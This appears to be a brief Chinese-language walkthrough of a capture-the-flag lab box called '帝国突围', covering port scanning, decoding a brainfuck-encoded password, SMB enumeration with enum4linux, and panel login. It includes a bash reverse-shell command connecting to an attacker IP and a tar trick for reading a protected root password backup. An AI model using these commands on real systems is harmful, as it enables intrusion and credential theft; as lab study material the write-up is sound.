帝国突围
1.nmap 半开扫描
2.复制IP到浏览器
-
打开控制台发现brainfuck加密字符
-
使用brainfuck进行解密,得出密码
-
不知道有什么用,先用记事本保存起来
3.用dirb扫描工具进行扫描
-
网址里面没有有用信息
-
其他扫描网址的工具也没有
3.nmap 全端口全服务扫描
-
发现10000,20000端口的http服务开放
-
登录10000端口发现需要用https协议进行加密
-
所以需要用https的协议打开10000和20000端口的网址
-
发现10000端口和20000端口的页面一摸一样
4.枚举工具
-
—— 利用Samba服务漏洞(文件共享服务可以使用 enum4linux 枚举信息)
-
工具介绍:Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息。
-
功能
-
命令使用
enum4linux 192.168.244.
-
结果,发现有一个名字叫做syber的本地用户
5.登录到赛博账户
-
结合之前发现的brainfuck解出来的密码,去10000和20000端口的网址去尝试登录,发现20000端口的登录了进去
-
左下角发现终端按钮
-
点击进去,登录到syber用户
-
进入后查看有什么可用文件,发现user.txt,打开后发现信息
-
翻译
-
找不到其他有用信息了
6.反弹shell,在kali中准备提权
-
kali打开监听端口
-
cyber终端反弹
bash -i >/dev/tcp/192.168.244.129/9999 0>&1
-
查看内核版本,发现版本太高,不能使用内核漏洞
-
kali准备提权,输入命令
-
找到管理员存放密码备份的文件
-
发现不能直接打开
-
把.old_pass.bak文件压缩到cyber的家目录下,在自己的家目录下解压,查看,
-
./tar -zcf yasuo.tar /var/backups/.pld_pass.bak ./tar -xvf yasuo.tar
- 打开文件,发现密码
-
登录root账户,成功